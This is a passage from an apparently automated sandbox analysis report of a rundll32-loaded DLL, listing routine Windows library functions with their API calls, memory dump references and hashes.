                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 10021F4D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                          • String ID: System
                                                                                                                          • API String ID: 46613423-3470857405
                                                                                                                          • Opcode ID: 4af17c4c8fdd97dc95f0f93d77672d7bd64c29950e8ea380bbe0e81d253d6bc4
                                                                                                                          • Instruction ID: 373189280b20a42e9b8e0e5153e2554ccb1f78fece54ef70e8a9f21809c5893c
                                                                                                                          • Opcode Fuzzy Hash: 4af17c4c8fdd97dc95f0f93d77672d7bd64c29950e8ea380bbe0e81d253d6bc4
                                                                                                                          • Instruction Fuzzy Hash: 65119175640268EBEB10DBA0DE85FEF77B8EF19781F800025FA05E6181EB709D05CB65
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100209ED Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 100209F4
                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000010,10020CA6,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020A05
                                                                                                                          • TlsGetValue.KERNEL32 ref: 10020A23
                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020A57
                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                          • _memset.LIBCMT ref: 10020AE2
                                                                                                                          • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1891723912-0
                                                                                                                          • Opcode ID: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                          • Instruction ID: bbf58174ed8a80918add6c1c4d28f9e8b2dc0fc786f447701b2046db94720ece
                                                                                                                          • Opcode Fuzzy Hash: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                          • Instruction Fuzzy Hash: F2319874500716EFD720DF10EC85D5EBBA2EF04310BA1C529F91A9A662DB30B990CB81
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10025BA5 Relevance: 12.3, APIs: 8, Instructions: 297memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 10025BAC
                                                                                                                            • Part of subcall function 1002426A: SysStringLen.OLEAUT32(?), ref: 10024272
                                                                                                                            • Part of subcall function 1002426A: CoGetClassObject.OLE32(?,?,00000000,1004B62C,?), ref: 10024290
                                                                                                                          • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 10025D36
                                                                                                                          • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 10025D57
                                                                                                                          • GlobalAlloc.KERNEL32(00000000,00000000), ref: 10025DA4
                                                                                                                          • GlobalLock.KERNEL32 ref: 10025DB2
                                                                                                                          • GlobalUnlock.KERNEL32(?), ref: 10025DCA
                                                                                                                          • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10025DED
                                                                                                                          • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10025E09
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 317715441-0
                                                                                                                          • Opcode ID: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                          • Instruction ID: 6b32e8b7721f49624c611e5d3fbfac2c00c012c139a68ad78311da97252ee3f4
                                                                                                                          • Opcode Fuzzy Hash: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                          • Instruction Fuzzy Hash: BCC12BB090024AEFCF14DFA4DC889AEB7B9FF48341BA14929F916DB251D7719A40CB64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10014A22 Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GlobalLock.KERNEL32 ref: 10014A3F
                                                                                                                          • lstrcmpA.KERNEL32(?,?), ref: 10014A4B
                                                                                                                          • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10014A5D
                                                                                                                          • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A7D
                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A85
                                                                                                                          • GlobalLock.KERNEL32 ref: 10014A8F
                                                                                                                          • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10014A9C
                                                                                                                          • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10014AB4
                                                                                                                            • Part of subcall function 10020495: GlobalFlags.KERNEL32(?), ref: 100204A0
                                                                                                                            • Part of subcall function 10020495: GlobalUnlock.KERNEL32(?,?,?,10014801,?,00000004,1000116F,?,?,1000113F), ref: 100204B2
                                                                                                                            • Part of subcall function 10020495: GlobalFree.KERNEL32(?), ref: 100204BD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 168474834-0
                                                                                                                          • Opcode ID: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                          • Instruction ID: 20fc1444fe35ab48259a21c9388e4acfe4ba196ce7874d1294122afbb026df8a
                                                                                                                          • Opcode Fuzzy Hash: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                          • Instruction Fuzzy Hash: 5111CAB6500604BBDB22DFA6CD89C6FBBEDEF897407514029FA01C6121DA31E940D728
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10020F2E Relevance: 12.0, APIs: 8, Instructions: 38COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetSystemMetrics.USER32 ref: 10020F3B
                                                                                                                          • GetSystemMetrics.USER32 ref: 10020F42
                                                                                                                          • GetSystemMetrics.USER32 ref: 10020F49
                                                                                                                          • GetSystemMetrics.USER32 ref: 10020F53
                                                                                                                          • GetDC.USER32(00000000), ref: 10020F5D
                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 10020F6E
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10020F76
                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 10020F7E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1151147025-0
                                                                                                                          • Opcode ID: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                          • Instruction ID: 9c0db37145597a9d8002a30536ddf2583a3ab63f37cab70819204e46a6a6359b
                                                                                                                          • Opcode Fuzzy Hash: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                          • Instruction Fuzzy Hash: 84F09670A40714AEF7206F718D8DF277BA4EBC6B51F01442AE611CB2D0D6B598018F50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1001820B Relevance: 10.8, APIs: 7, Instructions: 255memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 10018224
                                                                                                                          • MapDialogRect.USER32(?,00000000), ref: 100182B5
                                                                                                                          • SysAllocStringLen.OLEAUT32(?,?), ref: 100182D4
                                                                                                                          • CLSIDFromString.OLE32(?,?), ref: 100183C6
                                                                                                                            • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                          • CLSIDFromProgID.OLE32(?,?), ref: 100183CE
                                                                                                                          • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 10018468
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 100184BA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2841959276-0
                                                                                                                          • Opcode ID: c0153d1bb8fcf0a41aaabcf573d8d81effc90bbca259e310eefe5537c03a2762
                                                                                                                          • Instruction ID: 12b2beb2c71702a94885f2910fef0e7bfaf155135e6476596dcf7fffba126212
                                                                                                                          • Opcode Fuzzy Hash: c0153d1bb8fcf0a41aaabcf573d8d81effc90bbca259e310eefe5537c03a2762
                                                                                                                          • Instruction Fuzzy Hash: E2B1F075900219AFDB44CFA8C984AEE7BF4FF08344F41812AFC199B251E774EA94CB94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10029D32 Relevance: 10.6, APIs: 7, Instructions: 128COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 10029D39
                                                                                                                          • _memset.LIBCMT ref: 10029DA5
                                                                                                                            • Part of subcall function 1002BDD9: _memset.LIBCMT ref: 1002BDE1
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 10029DE5
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 10029E66
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 10029E75
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 10029E84
                                                                                                                          • VariantClear.OLEAUT32(00000000), ref: 10029E99
                                                                                                                            • Part of subcall function 1002981B: __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                            • Part of subcall function 1002981B: VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                            • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2905758408-0
                                                                                                                          • Opcode ID: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
                                                                                                                          • Instruction ID: f0b41ad0b9e8c5ab018840f5e4220df87c974ebe41012567005bb994ff67d79c
                                                                                                                          • Opcode Fuzzy Hash: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
                                                                                                                          • Instruction Fuzzy Hash: 285145B1900209DFDB50CFA4D984BDEBBF8FF08345F604529E516EB292DB74A944CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10026AC9 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3574576181-0
                                                                                                                          • Opcode ID: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
                                                                                                                          • Instruction ID: f024da645e7c2c1b7af1d173f97c0c2408efe7f25a4d8a65d4f7a6d8da03a969
                                                                                                                          • Opcode Fuzzy Hash: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
                                                                                                                          • Instruction Fuzzy Hash: D5414B71901229EFCB12DFA4CC45ADDBBB9FF48750F60811AF059AB151C770AA91CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10016570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 1001658F
                                                                                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1001664B
                                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10016662
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 1001667C
                                                                                                                          • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1001668E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                                          • String ID: Software\
                                                                                                                          • API String ID: 3878845136-964853688
                                                                                                                          • Opcode ID: f1b56214fd335d4f9116c0b783ab986839370396de21831478769312653865ef
                                                                                                                          • Instruction ID: 033a50cfb30fa6cc3e6a93964c888ed0270874f81604230ed873c3433942879c
                                                                                                                          • Opcode Fuzzy Hash: f1b56214fd335d4f9116c0b783ab986839370396de21831478769312653865ef
                                                                                                                          • Instruction Fuzzy Hash: EB41BD3590021ADBDF11DBA4CC85AEFB7F9EF49300F10452AF551E7290DB74AA84CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1001AC0A Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetParent.USER32(?), ref: 1001AC38
                                                                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AC5F
                                                                                                                          • UpdateWindow.USER32 ref: 1001AC79
                                                                                                                          • SendMessageA.USER32 ref: 1001AC9D
                                                                                                                          • SendMessageA.USER32 ref: 1001ACB7
                                                                                                                          • UpdateWindow.USER32 ref: 1001ACFD
                                                                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AD31
                                                                                                                            • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2853195852-0
                                                                                                                          • Opcode ID: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                          • Instruction ID: 2c496a546f4f3369c4007c2120619f6f6246382fa3c8875764faf214921a126d
                                                                                                                          • Opcode Fuzzy Hash: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                          • Instruction Fuzzy Hash: CF419C306047419FD721DF218D84A1BBAE4FFC6B95F00092DF8829A5A1E772D9C4CA92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100151F8 Relevance: 10.6, APIs: 7, Instructions: 111windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3219385341-0
                                                                                                                          • Opcode ID: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                          • Instruction ID: 62284d7f9b5d477bd881e5ff36e2f7527576b9e0115aa241cae08abffcb520cf
                                                                                                                          • Opcode Fuzzy Hash: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                          • Instruction Fuzzy Hash: B2314975301315EFDA11DB64ECC4D6F7AEEEB866C1B530469F840DB112DB31EC8196A2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1002A200 Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetWindow.USER32(?,00000002), ref: 1002A21B
                                                                                                                          • GetParent.USER32(?), ref: 1002A22C
                                                                                                                          • GetWindow.USER32(?,00000002), ref: 1002A24F
                                                                                                                          • GetWindow.USER32(?,00000002), ref: 1002A261
                                                                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 1002A270
                                                                                                                          • IsWindowVisible.USER32(?), ref: 1002A28A
                                                                                                                          • GetTopWindow.USER32(?), ref: 1002A2B0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$LongParentVisible
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 506644340-0
                                                                                                                          • Opcode ID: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                          • Instruction ID: 0686fc7eee0d828e519c8ddef4b664d273c3d3866c12363d81ce6f3f8585b441
                                                                                                                          • Opcode Fuzzy Hash: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                          • Instruction Fuzzy Hash: 8D219532A00B25EBD621EBB99C49F1B76DCFF8A790F810514F991EB152DF26EC848750
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10032A89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ___set_flsgetvalue.LIBCMT ref: 10032AB8
                                                                                                                          • __calloc_crt.LIBCMT ref: 10032AC4
                                                                                                                          • CreateThread.KERNEL32(00000002,?,V&',00000000,?,1001623D), ref: 10032B08
                                                                                                                          • GetLastError.KERNEL32(?,1001623D,?,?,100160A8,?,00000002,00000030,?,00000000), ref: 10032B12
                                                                                                                          • __dosmaperr.LIBCMT ref: 10032B2A
                                                                                                                            • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                            • Part of subcall function 10037753: __decode_pointer.LIBCMT ref: 1003775C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
